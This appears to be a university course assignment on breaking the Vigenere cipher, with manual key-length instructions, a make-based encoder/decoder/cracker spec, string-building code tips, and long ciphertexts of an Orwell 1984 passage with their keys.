You have 2 nights to work on this assignment. It requires that your lab01 works. If that is not the case you need to fix it first.

Github link: https://classroom.github.com/a/V1Q3bcHA

Here is some well known text encrypted with a Vigenere cypher (using a reasonably short key relative to the text size):

DVYCNZVJIHNVMNBDFTRRSNNXPIRMFMZZOYUFXGBEHKEVDDFVMTURWDAXMDGKMZBIOJZFOZLZOHLGVMFVBIQEPOUZOBCRSOVTVGNIUJVEUZEVTOZVPIFYPMRZUCBLHCGZXJHCENNZMVOFVONCJOGCFVAUTZRKIZJRUZEPQVEKPAGYFRBIMYVKJNNNBTVYBQRFGYEZWDAXPASKIZFGMZREBIQIFBHCBOVEHOUVDDETVGNKJJANIZAVWZEZGDAUNTFVMATIPRVEHBEZNVOFVOGYFHBLUCJYFIRMFMVKJNNUBHCUSDMQMTAFWZZSFMVENTFFVGJYFIRMFMVWJIQDZNRCGDAMPGHEUVEZMTCRVNVEHWRWPMRTPASZORNIFCBLTZFROYOIJITZOBHGUCRIFVEFGZIVSTSLOZERMDZVFONEEZFGFXVRMGLNIZAVWZEDZCLGPNTVUNHTIVALQKRIIVAUPAZVUCNKJOEVRPVIFNNJUMBEHHBIBGCIJIPZQGRKPKEVWZAKNZSIPHQVMDOVSVGVMTFKFKCZOBVEUJGYFNGIFZGROYZVUCBUJXNCMTXEPXXZOBCVPKYVTCNKTJSWUCREJVPTPPAKJOUZHCGZNZGFHZGKPNRRBNFFPINJJXNEUCVJJNZPTPOJUDGLUZSFSKVJUJYROYORMGJZUCNGIDYFTJCYJXNCGGBLSDFYDVGFUCEFXNUZNNRCGPCFOCVJTRBIEDDLJZGCZONBFOBKIZFYJKGYFMRZTIBKIDAXTPEGSDFZOBVEUCVJJAGYFTOLUFAVXDGRMHBJUVYCNZAZOOUVJMQVHMRVTJZVUDZVPMBKIZETIZEZTCIVSTAVBMYPUCRJBHRWFZYZOBFKPRNIENGYFJPVBIJZUCZVUCRIFIBNJNLFVMVETPYRSXVKZJSKIZZROCNKUJRJCZYKFYEFVIQSZRURSQRJBNVEEDNEJNYVTWLTPMNCSZRWTXBDNZETFNHISJHEENVKXDGYIZEJVMSIJBUKBIQCFAGKIZFKSZRKTONBFTBLXVGVSRNIEDGJFSGIFHRUPRAKPRAZTOUVCVGKFMLNIZEVUCNKOJOCFHBCFDFNBNUVEWLNBQRJBIQTPJYVEWLSSZRQFNJYJXURGZJYPPEJQMRMJJHJXZEVPPGFGNVXIOBWMVAUMJBBBOGYFXEFXYFFGRNKFMTRAZEJUCRIF

(MANUALLY) Find repeating groups of letters. (This is not a code exercise! Search by eye for repeated strings, or use control-F (search))
(MANUALLY) Calculate the distance between the matching strings. This takes 2 seconds using a programming language e.g.
```
 $python
  >>> len("asdlfkjalfjaslfjaslfjaslfjkasflj")
  34
  >>>
```
or
$echo -n "asdlfkjalfjaslfjaslfjaslfjkasflj" | wc

Note, echo adds a "\n" to the end of your text, so the -n flag will prevent that.
(MANUALLY) Try to find the key length by finding the overlapping common factors of the distances. (do this manually)
BEFORE YOU CODE - place a text file with your explanation of how you calculated the keylength in the repo and commit and push it!
(PROGRAM) Assuming you have the correct key-length, break the text into key-length different piles (use a programming language, but python slices work well.)
(PROGRAM) Run your ceasar cracker from your 1st lab to get decoded strings.
(PROGRAM) Merge the decoded strings back together (use a programming language)

Java/Python String concatenation is slow...

For large data sets, you do NOT want to use a bunch of string concatenation operations in java or python. (Since strings are mutable in c, you just need a large enough buffer.)

public class StringBuilderExample {
    public static void main(String[] args) {
        StringBuilder sb = new StringBuilder();
        //slow way commented out
        //String s =  "";
        for (int i = 0; i < 1000000; i++) {
            sb.append("Number: ").append(i).append("\n");
            //s += "Number: ";
            //s += i + ;
            //s += "\n";
        }
        String result = sb.toString();//faster than calculating s
    }
}

string_list = []
#s=""
for i in range(1000000):
        string_list.append("Number: ")
        string_list.append(str(i))
        string_list.append("\n")
        #s+="Number: ";
        #s+=str(i)
        #s+="\n"

final_string = "".join(string_list)#faster than calculating s

go back to the top of the page

2026-03-02

2026-03-02T12:00:00+00:00

2026-03-02

Vigenere weakness

What if you know part of the message? How can this help you break the cipher?

Quick, break the code:

Someone is sending The answers to important questions in life. Not the questions themselves, just the answers.

You snuck a peak at two of the decoded messages:

THEANSWERISDONTWORRYBEHAPPY

THEANSWERISJUSTDOIT

You were discovered and prohibited from reading the most important secret. Instead you decided to intercept the final message in it's encoded form. Since it contains the final answer you wish to decode this message:

You found the encoded text: VVQPYWTGFUHQSOVMFLZ

How can we try to break this message without computers?

Vigenere Lab!

You will write a tool that will act as a vigenere encoder/decoder/cracker.

cracking methodology:

To getkey or crack (same process with different outputs), you will brute force the system using the same methodology you used on your prior homework.

You previously knew the keylength broke up the text into 4 piles, used your ceasar craker on that text, then joined the text back together.

You will do the same thing to crack the cipher, but you will do it 12 times, for all keysizes = {1,2,3...,12}

After you crack it 12 times, do your distance calculation with the resultant text, and compare it to english. The closest one to english will be the correctly cracked text.

If you are running getkey, the output should be the key in string form (not numbers) so you need to keep track of your rotations and output the correct key based on those.

Lab02 repo

Please clone your lab02: https://classroom.github.com/a/ZVBhLg07

Required make Recipes:

encode: Print the ciphertext after encoding. All spaces and punctuation are removed.
example: make encode ARGS="plaintextfile keyfile"
decode: Print the ciphertext after encoding. All spaces and punctuation are removed.
example: make decode ARGS="ciphertext keyfile"
getkey: Print the most likely key. Keysize 12 will be the maximum size you have to check for. If two keys have the same similarity to english, use the smaller key.
example: make getkey ARGS="ciphertextfile"
crack: Print the most likely plaintext. Keysize 12 will be the maximum size you have to check for. If two keys have the same similarity to english, use the smaller key.
example: make crack ARGS="ciphertextfile"

Output

The output should be all caps, no spaces or punctuation.

Examples

You can place any of the previously given examples to help you test, but here are some samples of plaintext/key/ciphertext:

example encode

plain.txt : We know what we are, but not what we may be.

key.txt : ABCDEFG

make encode ARGS="plain.txt key.txt"
WFMQSBCHBVZIFXECWWRTZWICWAJSAZDH

example encode

plain.txt: Wherever you go there you are!

key.txt: ASDF

$ make encode ARGS="plain.txt key.txt"
WZHWENHWYGXLOLKJRWBTUSUJ

example encode + decode

plain.txt: We know what we are, but not what we may be.

key.txt : ZYXABC

$ make encode ARGS="plain.txt key.txt" > cipher.txt
$ cat cipher.txt
VCHNPYVFXTXGZPBBVVMMQWICSUBMBAAC
$ make decode ARGS="cipher.txt key.txt"
WEKNOWWHATWEAREBUTNOTWHATWEMAYBE

Examples with getkey / crack :

(The text for each file is listed after the example)

Example getkey:

$ make getkey ARGS="OrwellLong.txt"
THISISLONGER

Example crack:

(This example work with OrwellLong.txt AND OrwellShort.txt)

make crack ARGS="OrwellLong.txt"
ITWASABRIGHTCOLDDAYINAPRILANDTHECLOCKSWERESTRIKINGTHIRTEENWINSTONSMITHHISCHINNUZZLEDINTOHISBREASTINANEFFORTTOESCAPETHEVILEWINDSLIPPEDQUICKLYTHROUGHTHEGLASSDOORSOFVICTORYMANSIONSTHOUGHNOTQUICKLYENOUGHTOPREVENTASWIRLOFGRITTYDUSTFROMENTERINGALONGWITHHIMTHEHALLWAYSMELTOFBOILEDCABBAGEANDOLDRAGMATSATONEENDOFITACOLOUREDPOSTERTOOLARGEFORINDOORDISPLAYHADBEENTACKEDTOTHEWALLITDEPICTEDSIMPLYANENORMOUSFACEMORETHANAMETREWIDETHEFACEOFAMANOFABOUTFORTYFIVEWITHAHEAVYBLACKMOUSTACHEANDRUGGEDLYHANDSOMEFEATURESWINSTONMADEFORTHESTAIRSITWASNOUSETRYINGTHELIFTEVENATTHEBESTOFTIMESITWASSELDOMWORKINGANDATPRESENTTHEELECTRICCURRENTWASCUTOFFDURINGDAYLIGHTHOURSITWASPARTOFTHEECONOMYDRIVEINPREPARATIONFORHATEWEEKTHEFLATWASSEVENFLIGHTSUPANDWINSTONWHOWASTHIRTYNINEANDHADAVARICOSEULCERABOVEHISRIGHTANKLEWENTSLOWLYRESTINGSEVERALTIMESONTHEWAYONEACHLANDINGOPPOSITETHELIFTSHAFTTHEPOSTERWITHTHEENORMOUSFACEGAZEDFROMTHEWALLITWASONEOFTHOSEPICTURESWHICHARESOCONTRIVEDTHATTHEEYESFOLLOWYOUABOUTWHENYOUMOVEBIGBROTHERISWATCHINGYOUTHECAPTIONBENEATHITRANINSIDETHEFLATAFRUITYVOICEWASREADINGOUTALISTOFFIGURESWHICHHADSOMETHINGTODOWITHTHEPRODUCTIONOFPIGIRONTHEVOICECAMEFROMANOBLONGMETALPLAQUELIKEADULLEDMIRRORWHICHFORMEDPARTOFTHESURFACEOFTHERIGHTHANDWALLWINSTONTURNEDASWITCHANDTHEVOICESANKSOMEWHATTHOUGHTHEWORDSWERESTILLDISTINGUISHABLETHEINSTRUMENTTHETELESCREENITWASCALLEDCOULDBEDIMMEDBUTTHEREWASNOWAYOFSHUTTINGITOFFCOMPLETELYHEMOVEDOVERTOTHEWINDOWASMALLISHFRAILFIGURETHEMEAGRENESSOFHISBODYMERELYEMPHASIZEDBYTHEBLUEOVERALLSWHICHWERETHEUNIFORMOFTHEPARTYHISHAIRWASVERYFAIRHISFACENATURALLYSANGUINEHISSKINROUGHENEDBYCOARSESOAPANDBLUNTRAZORBLADESANDTHECOLDOFTHEWINTERTHATHADJUSTENDEDOUTSIDEEVENTHROUGHTHESHUTWINDOWPANETHEWORLDLOOKEDCOLDDOWNINTHESTREETLITTLEEDDIESOFWINDWEREWHIRLINGDUSTANDTORNPAPERINTOSPIRALSANDTHOUGHTHESUNWASSHININGANDTHESKYAHARSHBLUETHERESEEMEDTOBENOCOLOURINANYTHINGEXCEPTTHEPOSTERSTHATWEREPLASTEREDEVERYWHERETHEBLACKMOUSTACHIODFACEGAZEDDOWNFROMEVERYCOMMANDINGCORNERTHEREWASONEONTHEHOUSEFRONTIMMEDIATELYOPPOSITEBIGBROTHERISWATCHINGYOUTHECAPTIONSAIDWHILETHEDARKEYESLOOKEDDEEPINTOWINSTONSOWNDOWNATSTREETLEVELANOTHERPOSTERTORNATONECORNERFLAPPEDFITFULLYINTHEWINDALTERNATELYCOVERINGANDUNCOVERINGTHESINGLEWORDINGSOCINTHEFARDISTANCEAHELICOPTERSKIMMEDDOWNBETWEENTHEROOFSHOVEREDFORANINSTANTLIKEABLUEBOTTLEANDDARTEDAWAYAGAINWITHACURVINGFLIGHTITWASTHEPOLICEPATROLSNOOPINGINTOPEOPLESWINDOWSTHEPATROLSDIDNOTMATTERHOWEVERONLYTHETHOUGHTPOLICEMATTEREDBEHINDWINSTONSBACKTHEVOICEFROMTHETELESCREENWASSTILLBABBLINGAWAYABOUTPIGIRONANDTHEOVERFULFILMENTOFTHENINTHTHREEYEARPLANTHETELESCREENRECEIVEDANDTRANSMITTEDSIMULTANEOUSLYANYSOUNDTHATWINSTONMADEABOVETHELEVELOFAVERYLOWWHISPERWOULDBEPICKEDUPBYITMOREOVERSOLONGASHEREMAINEDWITHINTHEFIELDOFVISIONWHICHTHEMETALPLAQUECOMMANDEDHECOULDBESEENASWELLASHEARDTHEREWASOFCOURSENOWAYOFKNOWINGWHETHERYOUWEREBEINGWATCHEDATANYGIVENMOMENTHOWOFTENORONWHATSYSTEMTHETHOUGHTPOLICEPLUGGEDINONANYINDIVIDUALWIREWASGUESSWORKITWASEVENCONCEIVABLETHATTHEYWATCHEDEVERYBODYALLTHETIMEBUTATANYRATETHEYCOULDPLUGINYOURWIREWHENEVERTHEYWANTEDTOYOUHADTOLIVEDIDLIVEFROMHABITTHATBECAMEINSTINCTINTHEASSUMPTIONTHATEVERYSOUNDYOUMADEWASOVERHEARDANDEXCEPTINDARKNESSEVERYMOVEMENTSCRUTINIZEDWINSTONKEPTHISBACKTURNEDTOTHETELESCREENITWASSAFERTHOUGHASHEWELLKNEWEVENABACKCANBEREVEALINGAKILOMETREAWAYTHEMINISTRYOFTRUTHHISPLACEOFWORKTOWEREDVASTANDWHITEABOVETHEGRIMYLANDSCAPETHISHETHOUGHTWITHASORTOFVAGUEDISTASTETHISWASLONDONCHIEFCITYOFAIRSTRIPONEITSELFTHETHIRDMOSTPOPULOUSOFTHEPROVINCESOFOCEANIAHETRIEDTOSQUEEZEOUTSOMECHILDHOODMEMORYTHATSHOULDTELLHIMWHETHERLONDONHADALWAYSBEENQUITELIKETHISWERETHEREALWAYSTHESEVISTASOFROTTINGNINETEENTHCENTURYHOUSESTHEIRSIDESSHOREDUPWITHBAULKSOFTIMBERTHEIRWINDOWSPATCHEDWITHCARDBOARDANDTHEIRROOFSWITHCORRUGATEDIRONTHEIRCRAZYGARDENWALLSSAGGINGINALLDIRECTIONSANDTHEBOMBEDSITESWHERETHEPLASTERDUSTSWIRLEDINTHEAIRANDTHEWILLOWHERBSTRAGGLEDOVERTHEHEAPSOFRUBBLEANDTHEPLACESWHERETHEBOMBSHADCLEAREDALARGERPATCHANDTHEREHADSPRUNGUPSORDIDCOLONIESOFWOODENDWELLINGSLIKECHICKENHOUSESBUTITWASNOUSEHECOULDNOTREMEMBERNOTHINGREMAINEDOFHISCHILDHOODEXCEPTASERIESOFBRIGHTLITTABLEAUXOCCURRINGAGAINSTNOBACKGROUNDANDMOSTLYUNINTELLIGIBLE

I am adding only one block of text with two keylengths to give you something you can test against.

Contents of OrwellPlain.txt

It was a bright cold day in April, and the clocks were striking thirteen. Winston Smith, his chin nuzzled into his breast in an effort to escape the vile wind, slipped quickly through the glass doors of Victory Mansions, though not quickly enough to prevent a swirl of gritty dust from entering along with him. The hallway smelt of boiled cabbage and old rag mats. At one end of it a coloured poster, too large for indoor display, had been tacked to the wall. It depicted simply an enormous face, more than a metre wide: the face of a man of about forty-five, with a heavy black moustache and ruggedly handsome features. Winston made for the stairs. It was no use trying the lift. Even at the best of times it was seldom working, and at present the electric current was cut off during daylight hours. It was part of the economy drive in preparation for Hate Week. The flat was seven flights up, and Winston, who was thirty-nine and had a varicose ulcer above his right ankle, went slowly, resting several times on the way. On each landing, opposite the lift-shaft, the poster with the enormous face gazed from the wall. It was one of those pictures which are so contrived that the eyes follow you about when you move. BIG BROTHER IS WATCHING YOU, the caption beneath it ran. Inside the flat a fruity voice was reading out a list of figures which had something to do with the production of pig-iron. The voice came from an oblong metal plaque like a dulled mirror which formed part of the surface of the right-hand wall. Winston turned a switch and the voice sank somewhat, though the words were still distinguishable. The instrument (the telescreen, it was called) could be dimmed, but there was no way of shutting it off completely. He moved over to the window: a smallish, frail figure, the meagreness of his body merely emphasized by the blue overalls which were the uniform of the party. His hair was very fair, his face naturally sanguine, his skin roughened by coarse soap and blunt razor blades and the cold of the winter that had just ended. Outside, even through the shut window-pane, the world looked cold. Down in the street little eddies of wind were whirling dust and torn paper into spirals, and though the sun was shining and the sky a harsh blue, there seemed to be no colour in anything, except the posters that were plastered everywhere. The blackmoustachio'd face gazed down from every commanding corner. There was one on the house-front immediately opposite. BIG BROTHER IS WATCHING YOU, the caption said, while the dark eyes looked deep into Winston's own. Down at streetlevel another poster, torn at one corner, flapped fitfully in the wind, alternately covering and uncovering the single word INGSOC. In the far distance a helicopter skimmed down between the roofs, hovered for an instant like a bluebottle, and darted away again with a curving flight. It was the police patrol, snooping into people's windows. The patrols did not matter, however. Only the Thought Police mattered. Behind Winston's back the voice from the telescreen was still babbling away about pig-iron and the overfulfilment of the Ninth Three-Year Plan. The telescreen received and transmitted simultaneously. Any sound that Winston made, above the level of a very low whisper, would be picked up by it, moreover, so long as he remained within the field of vision which the metal plaque commanded, he could be seen as well as heard. There was of course no way of knowing whether you were being watched at any given moment. How often, or on what system, the Thought Police plugged in on any individual wire was guesswork. It was even conceivable that they watched everybody all the time. But at any rate they could plug in your wire whenever they wanted to. You had to live -- did live, from habit that became instinct -- in the assumption that every sound you made was overheard, and, except in darkness, every movement scrutinized. Winston kept his back turned to the telescreen. It was safer, though, as he well knew, even a back can be revealing. A kilometre away the Ministry of Truth, his place of work, towered vast and white above the grimy landscape. This, he thought with a sort of vague distaste -- this was London, chief city of Airstrip One, itself the third most populous of the provinces of Oceania. He tried to squeeze out some childhood memory that should tell him whether London had always been quite like this. Were there always these vistas of rotting nineteenth-century houses, their sides shored up with baulks of timber, their windows patched with cardboard and their roofs with corrugated iron, their crazy garden walls sagging in all directions? And the bombed sites where the plaster dust swirled in the air and the willow-herb straggled over the heaps of rubble; and the places where the bombs had cleared a larger patch and there had sprung up sordid colonies of wooden dwellings like chicken-houses? But it was no use, he could not remember: nothing remained of his childhood except a series of bright-lit tableaux occurring against no background and mostly unintelligible.

Key1.txt for orwell: SHORT

OrwellShort.txt is encoded with key=SHORT (using the methods described above):


AAKRLSIFZZZAQFEVKOPBFHDIBDHBUMZLQCHURGNXJLGKKARWEZLOWIMWLBNBFZHFGKTWKAZPGTAAUBLSRSSUBFACYBKIFVTKAWETFLTWHJAHFXKJOGXLOSMBDLKZGVZZZIHLRHNAJYCRLOFFNYOHYXYSOJLVVCILGMJZVLVFPFSUGZHFZHYHMNVEHLXIZVCSMVGGBUYMGWFVOWUHRLOPFCHXNFZMLFRLLLMFFFWUHVKAUUREGUUNBLOVZFLOSYTDSKRRKTSCMGMPFBDLRTTTIOXXSURFEVYOXFSAGRMGUSVGVVTZMSJCCHMYSUIGZHVKLVCCTJNSWHJPBUHGYRZLHSOPASKPVXFAOTDWKHFMZLKREDPHUXHPQKXVZWDIDFOEXFVFDHMZTRVWTCIXLOOETELHIXOPRVMZLTRVWVTRFSUCWTTVIKYGYHPYACSNBLOOYXSCMSESJYDHMZHRVZLOEWJBUXXVSMYTFKGFFWMSRMMYSJPAUGKHFTOUXXVFKAWZHRBJZWKPSZBFNKLHIRAUUKAWSWWMWCSETLAVVUWZHFYLPAVLAAKRLKLZUHEDCIDAUURGVHHGKWZSEMLOSVEWJHIBUJIIKWUHNTKJIKHXMRLKAUUUTQSWXALOCLKKPHNTKWOIMGMHYXWJCEHEFRIBNLWEIJLDRKSAWFGXVFYTLLKVXCAVVYDHHNTKZSMXFMZZZZAGLISURNBFZHFGOOCNTKAVZKLFBZGWHBUASKOMTJPQFLWBZTXJHPFOWOWJKANVKTFRZVPWUHJEGDZPKWZHZGYZSMXJHZKBELGFGLOSNTQVBVTUOZRGVPBXHHWCJBLLHYXDPTKLZHTKMZLDFLLLFNBLOHYXWUCIFGBGWTULURSWKTIHEAVVPSSZZMOHGFGWVTKAGZSGBUAIIXKDVZVZHFVLGJCEMJPJVWLOOKMZLSPXKMCCEGDMFNSICLMOOSERGBAFOWIWXUJVHYXJPGNTLJVZGYFCLMZLQRILPCEUWUSRMZPHITFPBJBVLHYXXSOKTXYIZMQCCZVWDOJKWHRZGYVIKTDPGKHXMWXNJLGNAAJVYTVZCDXLOWEZLVRFPAAVKAWWFFWMJHZHFVTGBYPFFGLOSMHAJSTTELTIHEHBFUDVBXFWAOCIDHELXDPYVTVBZCXVTWIKGYKYBUOTFKELRGTJACWMZLGLKXHQVHXAVVKANVKASURNTDSKZGKACEMMYBVWSZKZMUOOEWLOSMHAJSJTFRGFFWDVRMLOCLZZAVVPGYRJPWYSJMASZUBKAWEZMPGYTTSSKAWPBJMJBAVGLAVVMWSSJVJLSEBLDOJVSSZVWUVICWTLRZFELRSNLAVVKWDOJGGDOPHXZVLMLPBXBLVTWVGTDCXLLZPAWTCMXVVJVKLVHYXOPBUHOHGDTDSWJAXYOZEXPULKWAVVFWHUIXFLGJHXOWJUGKMDXJLZPXEWVRLAGSUUQAVVUDBSFOWYOCEKDVZVZDSIXLOSLGAMCIFGMHYXHHFKRZPGYTAYKRLNLFPYSPFYBKMOTXFHHLKSSZPLSUULBFLVZLKRWEKGBUYXFLRSRUVOILWZCRISURSEMUHITRVFSESKSJTFKHYXUVZUHXAVVPAUHVKLOOKASKXLLLLBUXVVIKLAKSVOWUHYKGBUYMZLGYNLDWEWGDDRGWAVVPGYZUEGVYVWUVZUWGDBZGLOSJMJLSKEAAHCXWKRZXKVTNBFKKVKWDVZKDPBXWMZHRGVACIGHHDVKAUHFLHPFREKHBUMZVIXALOSJNFDOJLZPBZGYHBUMZLGBRSOOILZIZLXLOSIXKLSDXVACSXFVQFEGBFZGSUMKAAUUVQULDKMZLDFLLLFJMZHHNXJLDCTKASIXVLJVKQDVVKWAVVUDHQBFGBGKTUOWFWXHQVZSGSUWGDBWKGTSMXJFQFFEHBUBFNQFKFLFKAWYSNTKVBVHFAVVAGBGVYJVBKBETSUBSASCRGWDFLAASSBYIFFMZLFZLOHHTAAUUPHMAVVVSWHZHFZOZWOOWCXLOSUTJRSPXKSCFDWKRVXHPBKHOPBJMGUGFPFKCNGSAGKKWLHCXNLZRGGAVVKHVGKXJACIGSACEXUVFEXJMZRIHLRWBLMICEQPBKAWDWEWSSHVKFHHVEQJCMXJPBXTFKIEVGCSIBFNHYXKPBXEWDCIWAUUJHUPBKAWMOIWAZHRGULOYXDPQFILLFJDATAVWVVKEUWAKVXFAVVKGVTJAGCSIXVMCITFPBJMSUHCBCLOSEMLPFMLSSRGVKOIMWKONTQHURBFDWKASJIIOAUUWEANVKBLDOJMZLDFEAJSGTLYCCLFVCGBFNWEMGWSFIDLGNBFKCNLLOSGTLYCCLVPREHLTOKMWYVFPWCSIHFSMKAWAVFNYOHGHDPQVFSAHVKWKPVAAURNBFZHFGKIOTDLOSMHAJSWKGTHYXLLZVLUYSVGOHGJMASZSTTIZZGYHKRRSICLMHPUZKGUOEWLOSFOWYTLEXPZDXFACWMZLBZGLOHYKWLMVTJWZRGLOSKXDLGTKWLBIXULWMXVHBUMJHBJFAAHVWKPALELHBVHMZZPTFFGFNFKHYTLDWELLVBDTVLOSHNLHYXDLJVEGMOMXJFZFPOOWJIWYKFNDKPVIAJYVWMWPPBLTCIXGCSILGSCEZSZVVKWTOZGWKKZMZPBKAWMWVEVVTMBKPCEPZPQYMZLAVMSSDCTIBSTHETOEWWKVVVGBZUUWZSVGSZKVEDHGYXSYRKAWYSNTKVTTHMYGVGGDOPHXRBFPAUUNAWAVVKQVINXJLPVBFNKRMUOSUTLHBPZACSEFGTSEMZVKFYLLBFKGUKYTLZMJMWTHYXLOCLZZADFEAJSGEMNUVWAUCETFFWEWACWUNSSKZKWDOJZMLGJPGYYZMOHGVOWUQFGULWMTTSSKASAHYXQDOKVZLRVOWYMSHVFOCELOSKBELPLMSAOERJHHVMZLMTHMSRGEMNWERGBFNBJLKYXFLJVKLOSPPSUHVWLVMFNZHRKHDPJVWAKZZOWMFFFZHPZMLOOKUWJODXAUGKBFJHZGLOSRLKBAGMAVBKASASMXJFGFNFKMFNEHRVPSZCMXJOSRKVHBUXPJSGMAURRKCUSJLWCSIREVJVFWUHJVJBHZGAGSUPAUGKHFRSGMZPGSTURHLKFLRKHLOSKXDLGTKWLBZMOHGJTXLFKAGBUYTKOSNXDSYEXOLJVGSIOTDUHBSXJLJVTDPBXTCPZFFWAFVTOHMKAWTWEBKAFPHXAFLMZOWJIDHQVHXDCIDLVKVKWKJRLLHBUPZPHVTTVJVMZLUIBEFZRGVZQRIWAVZLZLHYHMNVKPAAVRLGYHFYNHULXVPGKTKASKAAZKRLDVBUHFJVZXXJWKRGMOZKKAFZIGUSZMKLZWMZLHYBJKAFLLWCGNDVIJHXAVVIJVJZGULGFYGJSRGAHVVMJPSUMGZELXWGSFNLZCDXUOWCWZVCUFWTCIRLOOKLZVICWLLZCAATKYXLOSIEGURFGZHRREOHMJUWLBHNAASCBCLHYBKDSIXLOSIXSSKRRKAVVLWCWJMSZCWKGAHZGYUWEXLLSEMZJSEMMYMYHMZSJMZLWILAKSJLZVFVWMWKZMZIOLECZCWMATPVKLOSZKOPBUHOZDRMUOSUPAAVTTJKPFTJKOEWLOSZKJVCWLOPHYVGYFLZSASUBJVBKAWPFTKSGMXTJKSEPSSZJLSNUZGYPBREDKWIXUAWFGKHBUMZLPFFTLRJBLLGNAWYSKAWWZRLLLFUNKAGNBJSSUBFAVVTAYOEWLOSNBDSCNAWYPJMJHUXEWKCMXJAVVAWHDJHXYISUDLOEWLOSGESJSJPZLFVMZLPFFTZVRWUSSRKWKOCTJNSIISAQYTFKHYXJLVRWKWFLGYBDJHJKWUVGSCEBWZCWPGVRVGVDSCEAUUJEARSTAAJYVGZVIJXKIIKBLDOJGGBGVAWJCLEVUCKKWTSDUWYBFMZPBXKWTOZGWKCWAAZQYBDKVFHVLLTXHAOJXJPSJHXIFZZZAZZMLHPCXSBLFVUBFIBFNOXTAUGKGGIOTDYYCLGVHBUFGZHCRMUWEMWSZZZAIZV

OrwellLong.txt is encoded with key=THISISLONGER(using the methods described above)


BAESASMFVMLKVVTVLSJWAGTIBSIFLLSSPRSTDZEWZWDHEOOZGNBZQJESRTAZGZBGVKXWGNLZLJPAVFFNMRIUBUBGPADPEKEJMPVSVWQTBXXKHLAUIHPHUKZZELEAVVDZVVTVWXCAKCWMGNVFNNPLPWRZNYWUHVZKWXGWPZSIRTIFAAZBFZLFNNPFWLBIVIOCRLVGCYSHBVVVOLVLIKHWERSWZYQLBQOIFZJIHTMFBWCWAMECHUOOQLSVVSXYXOIDTOLMFSICMVNTWAWSQIESUHOWIFOCYJVRZTILASECAKIEWVNABSNCYUYIXKXGALPFGUSCTYOWNGCWAJSFKKQKXDLMUGHSXLVLIUVSQZSKALESTDTHQKTZVAMVAAXDYEEEXUWJUGFGSGGVFVZWBZLBNSIKKLEALWEVRLETXVNSUSYCSGFFNANGZLJTVBINBAPSPWLJLHPRVRUGCKEOPNIRGKZMOYPRYELRGKAGUWQSNZYIXZEAVKECASEUXMWJBZPGGGMILPBOIKYCHYIKKFQFOLSSYOJKXCMFILEVRHIJMVNLQEPGVZARLZMDLGXKBXOZGNIFLSEDEKWVGABZMWWSPZVZVJCJZWYHJGWTNAWXNVFFVTKUTFTAOZEVBAVJBAESAHLFGUJKALMUWFZALJVZOLQFXJPDNXEKBVVXWJSOGKAVXRBZMXWOGCEJLLDWVXWWTNXJNWIFLOTBFZSEPOWOIKEVVXXPGPVWIFOVNJEMTYQUWKPIYIIITIWNMZTGEOKYMHVCTWHSAZWCHDTQZWDHVTKJXCMJIDEWZKWFGAPWESJCAKETASIFLAYUBVTFLPBWBZPZVLXJAHNLBZPDBYXVKDQLPLSSRTSIFVCKNSNSTGDVWMZGULSSJGPCBAESAGYSBLXYHZMHQUEIEKWNAPKZIJPGBISEMYQNMVEVNZXYXLGWAXZZYUAPHBITWMEKUKRPHBUGDWMWTHVFMOMJQKHOGILZGNGGCLSSPGTKBVVTMFPOGNMKKHVAVKTRRZLVYSILIXCIVZCMHPKWESDFRGHZGNWMBSWWFZSWYPOMZWDKUOGYAHLKWEPHUORXMVLGEAEVGNIGKVLMKLTCAUJGBNQJWFEVRBSZVLKSUWQFBSEEHITGVYXSGGPGEHYMMDTYRGHLESMVUACFBXAYBJPXWJXSQVEIMVNLPWDIELETXVNLPWCWTNXYTULOIDWKVTWKHUBMZFPRNYAZMJPSVVEVRBSZVLASVCDCZKAYTABZWMRVGNINHYLKEWCSFZMCEKQKBAYUHOWYTITWBZPWAYXINTMFBLSSGKPVLJZWMFTHJGWTTSTWLUZIYJFVWPUEMVMIGZLVKLESAFZKNESWLOCLBAYUVZSWYJWEXDPHRRCYXTWNMVZJRXXFMOMOQFOCJGWDTSTAAZQFNOPWBNCJMLSSZKEXKLVWAKZTUOWSHKGEMJPZLKQGAHAAHWOPLZLVUSCWWNPFNRPJPOQUPOPFRZLVNUQXWJXCSZLVIHZLGZTGUGMIPHANMJJTNOVYBZNSKWYOGAVRESGKIFRIVTIYBZACQFCCHMLVGLLTGUZOEYIJHHXSVVMZHTXITGWJJDLRRYEEWAPWKGWRBLXYXDQFBWCHUGXYTKRMALPBQKHFNAAALWPJRTXYKVCYPLSSFNYKPPVVWOAOAKXYXDWJTVWCBQIUVVTVLGHBVTXYXZBJMWEZVZXCXLLVQWDCSCMEWDMJMOSWERMEZKCKBSYRGUVEIHXWZAYHBYTZKHTKIFOHUUYXAAPWAMYKNYWYBUQFOSYRGNIJDFIZIJDVORYVMOMJMKPSZKHKHIMFWUZZBAVZGHVQBZTBTKBTXWBLPWACFZIILAPSBOPFRVPRLAMJMVPJRXCNALZWBZPPYGGBFVCKBSNVVUHWTJMYIRPRQUAEYYWEMNPFLISDFHVVQFRQBXRVKAPWZWHOFURVHUBZMZZIFKJIHUBAUEPRVGXVEFWHXGDWGKFZZIZGBZPFVYARMJPAVYJCHZLVVHXLQGYGNOHNAPTWBZPRNXOVRLADWGVSQJIVIPVLWOTBFZSELVEFLGHBNZWKKLMLTWGSYGRFMOMJXGDHRXXFKUILWFPQBXRVKMTSXHPRSOXWNSTQQFEVRCMEWHTLMJYOGKPPVVDWZAYUNTHLGJWNMJTBTZLVLPVYTWHCEJMEZZWUQFEVRLEIWPALIFNSNNICBJWHBWCGXOQDXKLGEFMSGCIVGAPWZGZTFNSMXYMVNGCOAORJMHVLTAVSNHPLXIWLBDPOAJHRKAMVIOLMNMEZGDQLPSNIEBMEZMTAOZEWGCEJMOMHWDTQRVEKKVTKVGZDVTKZGAWHMGAZRYAZGKWOALSSCGXIHSAVQVYCGSEKMLZZWOPJRXSEEFBZMLSCHMLKIVTAKWXOGZIIXKJWPAYRJORJMVVKJSNYGNIMHPKWNJZAGNIKXSMKKJPSACEJLAQDTTLPORMEZHESGSMCHZTZZPZGVSYRGNIFOLZXCDQWYSIEMVNLPWYWAZLKAYMWGWLFCREEMOMLMDPGPXIVGYMUMAGSQGRUMYIFAETHGKHJBTCDBSYSBAWCRHVQAGFBQZLRMDQFALZBZGHVTIWNMLSSYKZVEVNSDWCMYUANAPAHMJHCHRHSXWQUSWOICHCZMTWJMGGSEYSCHUOSAZPFRSEZGLLOQLSWAZLVYPMDLGQJVYMFGDPAKZEVRSIKTSXDIIFSPUQDTULWLZPQBAPUULAWMFLGJKPCTZPWIJOHUKVVPHAGNUZIEYI